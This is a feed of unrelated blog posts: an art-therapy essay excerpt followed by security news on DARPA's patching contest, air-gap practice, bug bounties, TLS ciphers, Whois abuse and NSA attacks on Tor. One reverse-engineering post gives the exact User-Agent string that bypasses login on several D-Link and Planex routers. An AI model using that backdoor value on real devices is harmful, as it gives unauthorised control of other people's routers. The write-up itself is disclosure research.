We might think of works of art that exhort as both bossy and unnecessary, but this would assume an encouragement of virtue would always be contrary to our own desires. However, in reality, when we are calm and not under fire, most of us long to be good and wouldn’t mind the odd reminder to be so; we simply can’t find the motivation day to day. In relation to our aspirations to goodness, we suffer from what Aristotle called akrasia, or weakness of will. We want to behave well in our relationships, but slip up under pressure. We want to make more of ourselves, but lose motivation at a critical juncture. In these circumstances, we can derive enormous benefit from works of art that encourage us to be the best versions of ourselves, something that we would only resent if we had a manic fear of outside intervention, or thought of ourselves as perfect already.

The best kind of cautionary art — art that is moral without being “moralistic” — understands how easy it is to be attracted to the wrong things.

[…]

The task for artists, therefore, is to find new ways of prying open our eyes to tiresomely familiar, but critically important, ideas about how to lead a balanced and good life.

'A reason to say sorry.' Eve Arnold, 'Divorce in Moscow' (1966).

They summarize this function of art beautifully:

Art can save us time — and save our lives — through opportune and visceral reminders of balance and goodness that we should never presume we know enough about already.

5. SELF-UNDERSTANDING

Despite our best efforts at self-awareness, we’re all too often partial or complete mysteries to ourselves. Art, de Botton and Armstrong suggest, can help shed light on those least explored nooks of our psyche and make palpable the hunches of intuition we can only sense but not articulate:

We are not transparent to ourselves. We have intuitions, suspicions, hunches, vague musings, and strangely mixed emotions, all of which resist simple definition. We have moods, but we don’t really know them. Then, from time to time, we encounter works of art that seem to latch on to something we have felt but never recognized clearly before. Alexander Pope identified a central function of poetry as taking thoughts we experience half-formed and giving them clear expression: “what was often thought, but ne’er so well expressed.” In other words, a fugitive and elusive part of our own thinking, our own experience, is taken up, edited, and returned to us better than it was before, so that we feel, at last, that we know ourselves more clearly.

More than that, they argue, the self-knowledge art bequeaths gives us a language for communicating that to others — something that explains why we are so particular about the kinds of art with which we surround ourselves publicly, a sort of self-packaging we all practice as much on the walls of our homes as we do on our Facebook walls and art Tumblrs. While the cynic might interpret this as mere showing off, however, de Botton and Armstrong peel away this superficial interpretation to reveal the deeper psychological motive — our desire to communicate to others the subtleties of who we are and what we believe in a way that words might never fully capture.

6. GROWTH

Besides inviting deeper knowledge of our own selves, art also allows us to expand the boundaries of who we are by helping us overcome our chronic fear of the unfamiliar and living more richly by inviting the unknown:

Engagement with art is useful because it presents us with powerful examples of the kind of alien material that provokes defensive boredom and fear, and allows us time and privacy to learn to deal more strategically with it. An important first step in overcoming defensiveness around art is to become more open about the strangeness that we feel in certain contexts.

De Botton and Armstrong propose three critical steps to overcoming our defensiveness around art: First, acknowledging the strangeness we feel and being gentle on ourselves for feeling it, recognizing that it’s completely natural — after all, so much art comes from people with worldviews radically different from, and often contradictory to, our own; second, making ourselves familiar and thus more at home with the very minds who created that alien art; finally, looking for points of connection with the artist, “however fragile and initially tenuous,” so we can relate to the work that sprang from the context of their life with the personal reality of our own context.

7. APPRECIATION

Our attention, as we know, is “an intentional, unapologetic discriminator” that blinds us to so much of what is around us and to the magic in our familiar surroundings. Art, de Botton and Armstrong argue, can lift these blinders so we can truly absorb not only just what we’re expecting to see, but also what we aren’t:

One of our major flaws, and causes of unhappiness, is that we find it hard to take note of what is always around us. We suffer because we lose sight of the value of what is before us and yearn, often unfairly, for the imagined attraction elsewhere.

While habit can be a remarkable life-centering force, it is also a double-edged sword that can slice off a whole range of experiences as we fall into autopilot mode. Art can decondition our habituation to what is wonderful and worthy of rejoicing:

Art is one resource that can lead us back to a more accurate assessment of what is valuable by working against habit and inviting us to recalibrate what we admire or love.

'Paying attention to ordinary life.' Jasper Johns, 'Painted Bronze' (1960).

One example they offer comes from Jasper Johns’s famous bronze-cast beer cans, which nudge us to look at a mundane and familiar object with new eyes:

The heavy, costly material they are made of makes us newly aware of their separateness and oddity: we see them as though we had never laid eyes on cans before, acknowledging their intriguing identifies as a child or a Martian, both free of habit in this area, might naturally do.

Johns is teaching us a lesson: how to look with kinder and more alert eyes at the world around us.

Such is the power of art: It is both witness to and celebrator of the value of the ordinary, which we so frequently forsake in our quests for artificial greatness, a kind of resensitization tool that awakens us to the richness of our daily lives:

[Art] can teach us to be more just towards ourselves as we endeavor to make the best of our circumstances: a job we do not always love, the imperfections of middle age, our frustrated ambitions and our attempts to stay loyal to irritable but loved spouses. Art can do the opposite of glamorizing the unattainable; it can reawaken us to the genuine merit of life as we’re forced to lead it.

The rest of Art as Therapy goes on to examine such eternal questions as what makes good art, what kind of art one should make, how art should be displayed, studied, bought and sold, and a heartening wealth more. Complement it with 100 ideas that changed art.

Donating = Loving

Bringing you (ad-free) Brain Pickings takes hundreds of hours each month. If you find any joy and stimulation here, please consider becoming a Supporting Member with a recurring monthly donation of your choosing, between a cup of tea and a good dinner:


♥ $7 / month♥ $3 / month♥ $10 / month♥ $25 / month




You can also become a one-time patron with a single donation in any amount:





Brain Pickings has a free weekly newsletter. It comes out on Sundays and offers the week’s best articles. Here’s what to expect. Like? Sign up.

Brain Pickings takes 450+ hours a month to curate and edit across the different platforms, and remains banner-free. If it brings you any joy and inspiration, please consider a modest donation – it lets me know I'm doing something right. Holstee

25 Oct 08:23

DARPA Contest to Pay $2M for Automated Network Defense, Patching

by Michael Mimoso

The bug bounty continues to be turned on its ear.

Microsoft began the wave of paying premium money for mitigation technologies via its Blue Hat prizes, and now DARPA has gone all-in to the tune of $2 million for the development of an automated network defense system that not only scans for and identifies vulnerabilities, but patches them on the fly.

The Cyber Grand Challenge was announced today and DARPA officials said they plan on holding qualifying events where teams of experts would compete for a spot in the final competition to be held in 2016.

“Today, our time to patch a newly discovered security flaw is measured in days,” said Mike Walker, DARPA program manager. “Through automatic recognition and remediation of software flaws, the term for a new cyberattack may change from zero-day to zero-second.”

Competitors will be tasked with building an unmanned system that will go up against other similar systems looking for, and patching, critical vulnerabilities.

“The growth trends we’ve seen in cyberattacks and malware point to a future where automation must be developed to assist IT security analysts,” said Dan Kaufman, DARPA’s Information Innovation Office director.

The competition is expected to be carried out in stages, starting with qualifying events where teams of security and networking experts specializing in reverse engineering and program analysis would build systems that automatically analyze a software package for vulnerabilities. Teams that automatically identify, analyze and patch the bug in question would move on to the final, DARPA said in a statement.

DARPA will score entries on how well systems protect hosts, identify flaws and keep software running. First prize is $2 million, with the runners-up getting $1 million and third place receiving $750,000.

“Competitors can choose one of two routes: an unfunded track in which anyone capable of fielding a capable system can participate, and a funded track in which DARPA awards contracts to organizations presenting the most compelling proposals,” DARPA said in a statement.

The competition, DARPA said, emerged out of the continued failures of signature-based defenses, as well as static analysis, fuzzing, data flow tracking and more.

“A competitor will improve and combine these semiautomated technologies into an unmanned cyber reasoning system that can autonomously reason about novel program flaws, prove the existence of flaws in networked applications and formulate effective defenses,” DARPA said in its broad agency announcement. “Human analysts develop these signatures through a process of reasoning about software. In fully autonomous defense, a cyber system capable of reasoning about software will create its own knowledge, autonomously emitting and using knowledge quanta such as vulnerability scanner signatures, intrusion detection signatures, and security patches.”

23 Oct 08:14

DARPA slaps $2m on the bar for the ULTIMATE security bug SLAYER

by Iain Thomson

Brown trousers time for some in antivirus industry

It's a bad day for the vulnerability scanning industry: DARPA has announced a new multi-million-dollar competition to build a system that will be able to automatically analyze code, find its weak spots, and patch them against attack.…

22 Oct 19:09

Blackhole Exploit Kit Use Falls Off After Arrest

by Brian Prince

Two weeks ago, it was reported that police in Russia arrested the reputed author of the Blackhole Exploit kit, a man who went by the hacker alias 'Paunch.' In the aftermath, the number of spam campaigns using Blackhole to distribute malware fell off, and in the past two weeks have still not recovered.

read more

19 Oct 14:32

Air Gaps

by schneier

Since I started working with Snowden's documents, I have been using a number of tools to try to stay secure from the NSA. The advice I shared included using Tor, preferring certain cryptography over others, and using public-domain encryption wherever possible.

I also recommended using an air gap, which physically isolates a computer or local network of computers from the Internet. (The name comes from the literal gap of air between the computer and the Internet; the word predates wireless networks.)

But this is more complicated than it sounds, and requires explanation.

Since we know that computers connected to the Internet are vulnerable to outside hacking, an air gap should protect against those attacks. There are a lot of systems that use -- or should use -- air gaps: classified military networks, nuclear power plant controls, medical equipment, avionics, and so on.

Osama Bin Laden used one. I hope human rights organizations in repressive countries are doing the same.

Air gaps might be conceptually simple, but they're hard to maintain in practice. The truth is that nobody wants a computer that never receives files from the Internet and never sends files out into the Internet. What they want is a computer that's not directly connected to the Internet, albeit with some secure way of moving files on and off.

But every time a file moves back or forth, there's the potential for attack.

And air gaps have been breached. Stuxnet was a US and Israeli military-grade piece of malware that attacked the Natanz nuclear plant in Iran. It successfully jumped the air gap and penetrated the Natanz network. Another piece of malware named agent.btz, probably Chinese in origin, successfully jumped the air gap protecting US military networks.

These attacks work by exploiting security vulnerabilities in the removable media used to transfer files on and off the air-gapped computers.

Since working with Snowden's NSA files, I have tried to maintain a single air-gapped computer. It turned out to be harder than I expected, and I have ten rules for anyone trying to do the same:

1. When you set up your computer, connect it to the Internet as little as possible. It's impossible to completely avoid connecting the computer to the Internet, but try to configure it all at once and as anonymously as possible. I purchased my computer off-the-shelf in a big box store, then went to a friend's network and downloaded everything I needed in a single session. (The ultra-paranoid way to do this is to buy two identical computers, configure one using the above method, upload the results to a cloud-based anti-virus checker, and transfer the results of that to the air gap machine using a one-way process.)

2. Install the minimum software set you need to do your job, and disable all operating system services that you won't need. The less software you install, the less an attacker has available to exploit. I downloaded and installed OpenOffice, a PDF reader, a text editor, TrueCrypt, and BleachBit. That's all. (No, I don't have any inside knowledge about TrueCrypt, and there's a lot about it that makes me suspicious. But for Windows full-disk encryption it's that, Microsoft's BitLocker, or Symantec's PGPDisk -- and I am more worried about large US corporations being pressured by the NSA than I am about TrueCrypt.)

3. Once you have your computer configured, never directly connect it to the Internet again. Consider physically disabling the wireless capability, so it doesn't get turned on by accident.

4. If you need to install new software, download it anonymously from a random network, put it on some removable media, and then manually transfer it to the air-gapped computer. This is by no means perfect, but it's an attempt to make it harder for the attacker to target your computer.

5. Turn off all autorun features. This should be standard practice for all the computers you own, but it's especially important for an air-gapped computer. Agent.btz used autorun to infect US military computers.

6. Minimize the amount of executable code you move onto the air-gapped computer. Text files are best. Microsoft Office files and PDFs are more dangerous, since they might have embedded macros. Turn off all macro capabilities you can on the air-gapped computer. Don't worry too much about patching your system; in general, the risk of the executable code is worse than the risk of not having your patches up to date. You're not on the Internet, after all.

7. Only use trusted media to move files on and off air-gapped computers. A USB stick you purchase from a store is safer than one given to you by someone you don't know -- or one you find in a parking lot.

8. For file transfer, a writable optical disk (CD or DVD) is safer than a USB stick. Malware can silently write data to a USB stick, but it can't spin the CD-R up to 1000 rpm without your noticing. This means that the malware can only write to the disk when you write to the disk. You can also verify how much data has been written to the CD by physically checking the back of it. If you've only written one file, but it looks like three-quarters of the CD was burned, you have a problem. Note: the first company to market a USB stick with a light that indicates a write operation -- not read or write; I've got one of those -- wins a prize.

9. When moving files on and off your air-gapped computer, use the absolute smallest storage device you can. And fill up the entire device with random files. If an air-gapped computer is compromised, the malware is going to try to sneak data off it using that media. While malware can easily hide stolen files from you, it can't break the laws of physics. So if you use a tiny transfer device, it can only steal a very small amount of data at a time. If you use a large device, it can take that much more. Business-card-sized mini-CDs can have capacity as low as 30 MB. I still see 1-GB USB sticks for sale.

10. Consider encrypting everything you move on and off the air-gapped computer. Sometimes you'll be moving public files and it won't matter, but sometimes you won't be, and it will. And if you're using optical media, those disks will be impossible to erase. Strong encryption solves these problems. And don't forget to encrypt the computer as well; whole-disk encryption is the best.

One thing I didn't do, although it's worth considering, is use a stateless operating system like Tails. You can configure Tails with a persistent volume to save your data, but no operating system changes are ever saved. Booting Tails from a read-only DVD -- you can keep your data on an encrypted USB stick -- is even more secure. Of course, this is not foolproof, but it greatly reduces the potential avenues for attack.

Yes, all this is advice for the paranoid. And it's probably impossible to enforce for any network more complicated than a single computer with a single user. But if you're thinking about setting up an air-gapped computer, you already believe that some very powerful attackers are after you personally. If you're going to use an air gap, use it properly.

Of course you can take things further. I have met people who have physically removed the camera, microphone, and wireless capability altogether. But that's too much paranoia for me right now.

This essay previously appeared on Wired.com.

EDITED TO ADD: Yes, I am ignoring TEMPEST attacks. I am also ignoring black bag attacks against my home.

19 Oct 14:25

Fingerprinting Burner Phones

by schneier

In one of the documents recently released by the NSA as a result of an EFF lawsuit, there's discussion of a specific capability of a call records database to identify disposable "burner" phones.

Let’s consider, then, the very specific data this query tool was designed to return: The times and dates of the first and last call events, but apparently not the times and dates of calls between those endpoints. In other words, this tool is supporting analytic software that only cares when a phone went online, and when it stopped being used. It also gets the total number of calls, and the ratio of unique contacts to calls, but not the specific numbers contacted. Why, exactly, would this limited set of information be useful? And why, in particular, might you want to compare that information across a large number of phones there’s not yet any particular reason to suspect?

One possibility that jumps out at me -- and perhaps anyone else who’s a fan of The Wire -- is that this is the kind of information you would want if you were trying to identify disposable prepaid “burner” phones being used by a target who routinely cycles through cell phones as a countersurveillance tactic. The number of unique contacts and call/contact ratio would act as a kind of rough fingerprint -- you’d assume a phone being used for dedicated clandestine purposes to be fairly consistent on that score -- while the first/last call dates help build a timeline: You’re looking for a series of phones that are used for a standard amount of time, and then go dead just as the next phone goes online.

Consider this another illustration of the value of metadata.

14 Oct 19:16

Reverse Engineering a D-Link Backdoor

by Craig

All right. It’s Saturday night, I have no date, a two-liter bottle of Shasta and my all-Rush mix-tape…let’s hack.

On a whim I downloaded firmware v1.13 for the DIR-100 revA. Binwalk quickly found and extracted a SquashFS file system, and soon I had the firmware’s web server (/bin/webs) loaded into IDA:

Strings inside /bin/webs

Strings inside /bin/webs

Based on the above strings listing, the /bin/webs binary is a modified version of thttpd which provides the administrative interface for the router. It appears to have been modified by Alphanetworks (a spin-off of D-Link). They were even thoughtful enough to prepend many of their custom function names with the string “alpha”:

Alphanetworks' custom functions

Alphanetworks’ custom functions

The alpha_auth_check function sounds interesting!

This function is called from a couple different locations, most notably from alpha_httpd_parse_request:

Function call to alpha_auth_check

Function call to alpha_auth_check

We can see that alpha_auth_check is passed one argument (whatever is stored in register $s2); if alpha_auth_check returns -1 (0xFFFFFFFF), the code jumps to the end of alpha_httpd_parse_request, otherwise it continues processing the request.

Some further examination of the use of register $s2 prior to the alpha_auth_check call indicates that it is a pointer to a data structure which contains char* pointers to various pieces of the received HTTP request, such as HTTP headers and the requested URL:

$s2 is a pointer to a data structure

$s2 is a pointer to a data structure

We can now define a function prototype for alpha_auth_check and begin to enumerate elements of the data structure:

struct http_request_t
{
    char unknown[0xB8];
    char *url; // At offset 0xB8 into the data structure
};

int alpha_auth_check(struct http_request_t *request);

alpha_auth_check itself is a fairly simple function. It does a few strstr’s and strcmp’s against some pointers in the http_request_t structure, then calls check_login, which actually does the authentication check. If the calls to any of the strstr’s / strcmp’s or check_login succeed, it returns 1; else, it redirects the browser to the login page and returns -1:

alpha_auth_check code snippet

alpha_auth_check code snippet

Those strstr’s look interesting. They take the requested URL (at offset 0xB8 into the http_request_t data structure, as previously noted) and check to see if it contains the strings “graphic/” or “public/”. These are sub-directories under the device’s web directory, and if the requested URL contains one of those strings, then the request is allowed without authentication.

It is the final strcmp however, which proves a bit more compelling:

An interesting string comparison in alpha_auth_check

An interesting string comparison in alpha_auth_check

This is performing a strcmp between the string pointer at offset 0xD0 inside the http_request_t structure and the string “xmlset_roodkcableoj28840ybtide”; if the strings match, the check_login function call is skipped and alpha_auth_check returns 1 (authentication OK).

A quick Google for the “xmlset_roodkcableoj28840ybtide” string turns up only a single Russian forum post from a few years ago, which notes that this is an “interesting line” inside the /bin/webs binary. I’d have to agree.

So what is this mystery string getting compared against? If we look back in the call tree, we see that the http_request_t structure pointer is passed around by a few functions:

call_graph

It turns out that the pointer at offset 0xD0 in the http_request_t structure is populated by the httpd_parse_request function:

Checks for the User-Agent HTTP header

Checks for the User-Agent HTTP header

Populates http_request_t + 0xD0 with a pointer to the User-Agent header string

Populates http_request_t + 0xD0 with a pointer to the User-Agent header string

This code is effectively:

if(strncasecmp(header, "User-Agent:", strlen("User-Agent:")) != NULL)
{
    http_request_t->0xD0 = header + strlen("User-Agent:") + strspn(header, " \t");
}

Knowing that offset 0xD0 in http_request_t contains a pointer to the User-Agent header, we can now re-construct the alpha_auth_check function:

#define AUTH_OK 1
#define AUTH_FAIL -1

int alpha_auth_check(struct http_request_t *request)
{
    if(strstr(request->url, "graphic/") ||
       strstr(request->url, "public/") ||
       strcmp(request->user_agent, "xmlset_roodkcableoj28840ybtide") == 0)
    {
        return AUTH_OK;
    }
    else
    {
        // These arguments are probably user/pass or session info
        if(check_login(request->0xC, request->0xE0) != 0)
        {
            return AUTH_OK;
        }
    }

    return AUTH_FAIL;
}

In other words, if your browser’s user agent string is “xmlset_roodkcableoj28840ybtide” (no quotes), you can access the web interface without any authentication and view/change the device settings (a DI-524UP is shown, as I don’t have a DIR-100 and the DI-524UP uses the same firmware):

Accessing the admin page of a DI-524UP

Accessing the admin page of a DI-524UP

Based on the source code of the HTML pages and some Shodan search results, it can be reasonably concluded that the following D-Link devices are likely affected:

  • DIR-100
  • DIR-120
  • DI-624S
  • DI-524UP
  • DI-604S
  • DI-604UP
  • DI-604+
  • TM-G5240

Additionally, several Planex routers also appear to use the same firmware:

  • BRL-04R
  • BRL-04UR
  • BRL-04CW

You stay classy, D-Link.

UPDATE:

The ever neighborly Travis Goodspeed pointed out that this backdoor is used by the /bin/xmlsetc binary in the D-Link firmware. After some grepping, I found several binaries that appear to use xmlsetc to automatically re-configure the device’s settings (example: dynamic DNS). My guess is that the developers realized that some programs/services needed to be able to change the device’s settings automatically; realizing that the web server already had all the code to change these settings, they decided to just send requests to the web server whenever they needed to change something. The only problem was that the web server required a username and password, which the end user could change. Then, in a eureka moment, Joel jumped up and said, “Don’t worry, for I have a cunning plan!”.

Also, several people have reported in the comments that some versions of the DIR-615 are also affected, including those distributed by Virgin Mobile. I have not yet verified this, but it seems quite reasonable.

UPDATE #2:

Arbitrary code execution is also possible, thanks to the backdoor. Proof of concept.

11 Oct 18:04

Going beyond vulnerability rewards

by lcamtuf
Posted by Michal Zalewski, Google Security Team

We all benefit from the amazing volunteer work done by the open source community. That’s why we keep asking ourselves how to take the model pioneered with our Vulnerability Reward Program - and employ it to improve the security of key third-party software critical to the health of the entire Internet.

We thought about simply kicking off an OSS bug-hunting program, but this approach can easily backfire. In addition to valid reports, bug bounties invite a significant volume of spurious traffic - enough to completely overwhelm a small community of volunteers. On top of this, fixing a problem often requires more effort than finding it.

So we decided to try something new: provide financial incentives for down-to-earth, proactive improvements that go beyond merely fixing a known security bug. Whether you want to switch to a more secure allocator, to add privilege separation, to clean up a bunch of sketchy calls to strcat(), or even just to enable ASLR - we want to help!

We intend to roll out the program gradually, based on the quality of the received submissions and the feedback from the developer community. For the initial run, we decided to limit the scope to the following projects:

  • Core infrastructure network services: OpenSSH, BIND, ISC DHCP
  • Core infrastructure image parsers: libjpeg, libjpeg-turbo, libpng, giflib
  • Open-source foundations of Google Chrome: Chromium, Blink
  • Other high-impact libraries: OpenSSL, zlib
  • Security-critical, commonly used components of the Linux kernel (including KVM)
We intend to soon extend the program to:
  • Widely used web servers: Apache httpd, lighttpd, nginx
  • Popular SMTP services: Sendmail, Postfix, Exim
  • Toolchain security improvements for GCC, binutils, and llvm
  • Virtual private networking: OpenVPN
How to participate?

Please submit your patches directly to the maintainers of the individual projects. Once your patch is accepted and merged into the repository, please send all the relevant details to security-patches@google.com. If we think that the submission has a demonstrable, positive impact on the security of the project, you will qualify for a reward ranging from $500 to $3,133.7.

Before participating, please read the official rules posted on this page; the document provides additional information about eligibility, rewards, and other important stuff.

Happy patching!

09 Oct 19:41

Researchers Nab $28k in Microsoft Bug Bounty Program

by Dennis Fisher

As part of its first-ever bounty program, Microsoft has paid out $28,000 to a small group of researchers who identified and reported vulnerabilities in Internet Explorer 11. The IE 11 bounty program only ran for one month during the summer, but it attracted a number of submissions from well-known researchers.

The Microsoft bug bounty program for IE 11 began in June and ended in late July, during the preview period for the browser. Researchers who reported vulnerabilities in the latest version of the company’s browser had the opportunity to earn as much as $11,000. None of the researchers who submitted bugs during the IE 11 window came close to a reward at that level, with the highest payment being $9,400 to James Forshaw for four vulnerabilities discovered in IE and a bonus for finding some IE design vulnerabilities.

Microsoft’s reward program was announced in June after many years of speculation by security researchers about the company’s intentions. Microsoft officials had said in the past that the company didn’t need to pay rewards for vulnerabilities because many researchers came directly to Microsoft with details of new vulnerabilities. That state of affairs changed over the course of the last year or so, leading Microsoft to establish its own take on the bug bounty programs run by many other software vendors.

Unlike Google, PayPal and others, Microsoft’s program–outside of the IE 11 reward–is mainly geared toward paying for innovative attack techniques. The company is offering as much as $100,000 for offensive techniques that are capable of bypassing the latest exploit mitigation technologies on the newest version of Windows. That program is still ongoing.

Among the other researchers who received rewards from Microsoft in the IE 11 program are Peter Vreugdenhill of Exploit Intelligence, Fermin J. Serna of Google, Masato Kinugawa, Ivan Fratric of Google and Jose Antonio Vazquez Gonzalez of Yenteasy Security Research.

The $28,000 Microsoft paid during the IE 11 program isn’t a big number in the grand scheme of things, particularly when compared to the tens of thousands of dollars the Google pays out on a regular basis for Chrome bugs. But the researchers who submitted bugs to the program are a good indication that the security community is taking Microsoft’s program seriously, despite the relatively low payments available.

Image from Flickr photos of Damian Gadal. 

09 Oct 19:28

ChaCha20 and Poly1305 for TLS

Today, TLS connections predominantly use one of two families of cipher suites: RC4 based or AES-CBC based. However, in recent years both of these families of cipher suites have suffered major problems. TLS's CBC construction was the subject of the BEAST attack (fixed with 1/n-1 record splitting or TLS 1.1) and Lucky13 (fixed with complex implementation tricks). RC4 was found to have key-stream biases that cannot effectively be fixed.

Although AES-CBC is currently believed to be secure when correctly implemented, a correct implementation is so complex that there remains strong motivation to replace it.

Clearly we need something better. An obvious alternative is AES-GCM (AES-GCM is AES in counter mode with a polynomial authenticator over GF(2128)), which is already specified for TLS and has some implementations. Support for it is in the latest versions of OpenSSL and it has been the top preference cipher of Google servers for some time now. Chrome support should be coming in Chrome 31, which is expected in November. (Although we're still fighting to get TLS 1.2 support deployed in Chrome 30 due to buggy servers.)

AES-GCM isn't perfect, however. Firstly, implementing AES and GHASH (the authenticator part of GCM) in software in a way which is fast, secure and has good key agility is very difficult. Both primitives are suited to hardware implementations and good software implementations are worthy of conference papers. The fact that a naive implementation (which is also what's recommended in the standard for GHASH!) leaks timing information is a problem.

AES-GCM also isn't very quick on lower-powered devices such as phones, and phones are now a very important class of device. A standard phone (which is always defined by whatever I happen to have in my pocket; a Galaxy Nexus at the moment) can do AES-128-GCM at only 25MB/s and AES-256-GCM at 20MB/s (both measured with an 8KB block size).

Lastly, if we left things as they are, AES-GCM would be the only good cipher suite in TLS. While there are specifications for AES-CCM and for fixing the AES-CBC construction, they are all AES based and, in the past, having some diversity in cipher suites has proven useful. So we would be looking for an alternative even if AES-GCM were perfect.

In light of this, Google servers and Chrome will soon be supporting cipher suites based around ChaCha20 and Poly1305. These are primitives developed by Dan Bernstein and are fast, secure, have high quality, public domain implementations, are naturally constant time and have nearly perfect key agility.

On the same phone as the AES-GCM speeds were measured, the ChaCha20+Poly1305 cipher suite runs at 92MB/s (which should be compared against the AES-256-GCM speed as ChaCha20 is a 256-bit cipher).

In addition to support in Chrome and on Google's servers, myself and my colleague, Elie Bursztein, are working on patches for NSS and OpenSSL to support this cipher suite. (And I should thank Dan Bernstein, Andrew M, Ted Krovetz and Peter Schwabe for their excellent, public domain implementations of these algorithms. Also Ben Laurie and Wan-Teh Chang for code reviews, suggestions etc.)

But while AES-GCM's hardware orientation is troublesome for software implementations, it's obviously good news for hardware implementations and some systems do have hardware AES-GCM support. Most notably, Intel chips have had such support (which they call AES-NI) since Westmere. Where such support exists, it would be a shame not to use it because it's constant time and very fast (see slide 17). So, once ChaCha20+Poly1305 is running, I hope to have clients change their cipher suite preferences depending on the hardware that they're running on, so that, in cases where both client and server support AES-GCM in hardware, it'll be used.

To wrap all this up, we need to solve a long standing, browser TLS problem: in order to deal with buggy HTTPS servers on the Internet (of which there are many, sadly), browsers will retry failed HTTPS connections with lower TLS version numbers in order to try and find a version that doesn't trigger the problem. As a last attempt, they'll try an SSLv3 connection with no extensions.

Several useful features get jettisoned when this occurs but the important one for security, up until now, has been that elliptic curve support is disabled in SSLv3. For servers that support ECDHE but not DHE that means that a network attacker can trigger version downgrades and remove forward security from a connection. Now that AES-GCM and ChaCha20+Poly1305 are important we have to worry about them too as these cipher suites are only defined for TLS 1.2.

Something needs to be done to fix this so, with Chrome 31, Chrome will no longer downgrade to SSLv3 for Google servers. In this experiment, Google servers are being used as an example of non-buggy servers. The experiment hopes to show that networks are sufficiently transparent that they'll let at least TLS 1.0 through. We know from Chrome's statistics that connections to Google servers do end up getting downgraded to SSLv3 sometimes, but all sorts of random network events can trigger a downgrade. The fear is that there's some common network element that blocks TLS connections by deep-packet inspection, which we'll measure by breaking them and seeing how many bug reports we get.

If that works then, in Chrome 32, no fallbacks will be permitted for Google servers at all. This stage of the experiment tests that the network is transparent to TLS 1.2 by, again, breaking anything that isn't and seeing if it causes bug reports.

If both those experiments work then, great! We can define a way for servers to securely indicate that they don't need version fallback. It would be nice to have used the renegotiation extension for this, but I think that there are likely already too many broken servers that support that, so another SCSV is probably needed.

If we get all of the above working then we're not in too bad a state with respect to TLS cipher suites. At least, once most of the world has upgraded in any case.

07 Oct 13:25

A Study of Whois Privacy and Proxy Service Abuse

by Richard Clayton

ICANN have now published a draft for public comment of “A Study of Whois Privacy and Proxy Service Abuse“. I am the primary author of this report — the work being done whilst I was collaborating with the National Physical Laboratory (NPL) under EPSRC Grant EP/H018298/1.

This particular study was originally proposed by ICANN in 2010, one of several that were to examine the impact of domain registrants using privacy services (where the name of a domain registrant is published, but contact details are kept private) and proxy services (where even the domain licensee’s name is not made available on the public database).

ICANN wanted to know if a significant percentage of the domain names used to conduct illegal or harmful Internet activities are registered via privacy or proxy services to obscure the perpetrator’s identity? No surprises in our results: they are!

However, it’s more interesting to ask whether this percentage is somewhat higher than the usage of privacy or proxy services for entirely lawful and harmless Internet activities? This turned out NOT to be the case — for example banks use privacy and proxy services almost as often as the registrants of domains used in the hosting of child sexual abuse images; and the registrants of domains used to host (legal) adult pornography use privacy and proxy services more often than most (but not all) of the different types of malicious activity that we studied.

It’s also relevant to consider what other methods might be chosen by those involved in criminal activity to obscure their identities, because in the event of changes to privacy and proxy services, it is likely that they will turn to these alternatives.

Accordingly, we determined experimentally whether a significant percentage of the domain names we examined have been registered with incorrect Whois contact information – and specifically whether or not we could reach the domain registrant using a phone number from the Whois information. We asked them a single question in their native language “did you register this domain”?

We got somewhat variable results from our phone survey — but the pattern becomes clear if we consider whether there is any a priori hope at all of ringing up the domain registrant?

If we sum up the likelihoods:

  • uses privacy or proxy service
  • no (apparently valid) phone number in whois
  • number is apparently valid, but fails to connect
  • number reaches someone other than the registrant

then we find that for legal and harmless activities the probability of a phone call not being possible ranges between 24% (legal pharmacies on the Legitscript list) and 62% (owners of lawful websites that someone has broken into and installed phishing pages). For malicious activities the probability of failure is 88% or more, with typosquatting (which is a civil matter, rather than a criminal one) sitting at 68% (some of the typosquatters want to hide, some do not).

There’s lots of detail and supporting statistics in the report… and an executive summary for the time-challenged. It will provide real data, rather than just speculative anecdotes, to inform the debate around reforming Whois — and the difficulties of doing so.

07 Oct 13:17

How the NSA Attacks Tor/Firefox Users With QUANTUM and FOXACID

by schneier

The online anonymity network Tor is a high-priority target for the National Security Agency. The work of attacking Tor is done by the NSA's application vulnerabilities branch, which is part of the systems intelligence directorate, or SID. The majority of NSA employees work in SID, which is tasked with collecting data from communications systems around the world.

According to a top-secret NSA presentation provided by the whistleblower Edward Snowden, one successful technique the NSA has developed involves exploiting the Tor browser bundle, a collection of programs designed to make it easy for people to install and use the software. The trick identifies Tor users on the Internet and then executes an attack against their Firefox web browser.

The NSA refers to these capabilities as CNE, or computer network exploitation.

The first step of this process is finding Tor users. To accomplish this, the NSA relies on its vast capability to monitor large parts of the Internet. This is done via the agency's partnership with US telecoms firms under programs codenamed Stormbrew, Fairview, Oakstar and Blarney.

The NSA creates "fingerprints" that detect HTTP requests from the Tor network to particular servers. These fingerprints are loaded into NSA database systems like XKeyscore, a bespoke collection and analysis tool that NSA boasts allows its analysts to see "almost everything" a target does on the Internet.

Using powerful data analysis tools with codenames such as Turbulence, Turmoil and Tumult, the NSA automatically sifts through the enormous amount of Internet traffic that it sees, looking for Tor connections.

Last month, Brazilian TV news show Fantastico showed screenshots of an NSA tool that had the ability to identify Tor users by monitoring Internet traffic.

The very feature that makes Tor a powerful anonymity service, and the fact that all Tor users look alike on the Internet, makes it easy to differentiate Tor users from other web users. On the other hand, the anonymity provided by Tor makes it impossible for the NSA to know who the user is, or whether or not the user is in the US.

After identifying an individual Tor user on the Internet, the NSA uses its network of secret Internet servers to redirect those users to another set of secret Internet servers, with the codename FoxAcid, to infect the user's computer. FoxAcid is an NSA system designed to act as a matchmaker between potential targets and attacks developed by the NSA, giving the agency opportunity to launch prepared attacks against their systems.

Once the computer is successfully attacked, it secretly calls back to a FoxAcid server, which then performs additional attacks on the target computer to ensure that it remains compromised long-term, and continues to provide eavesdropping information back to the NSA.

Exploiting the Tor browser bundle

Tor is a well-designed and robust anonymity tool, and successfully attacking it is difficult. The NSA attacks we found individually target Tor users by exploiting vulnerabilities in their Firefox browsers, and not the Tor application directly.

This, too, is difficult. Tor users often turn off vulnerable services like scripts and Flash when using Tor, making it difficult to target those services. Even so, the NSA uses a series of native Firefox vulnerabilities to attack users of the Tor browser bundle.

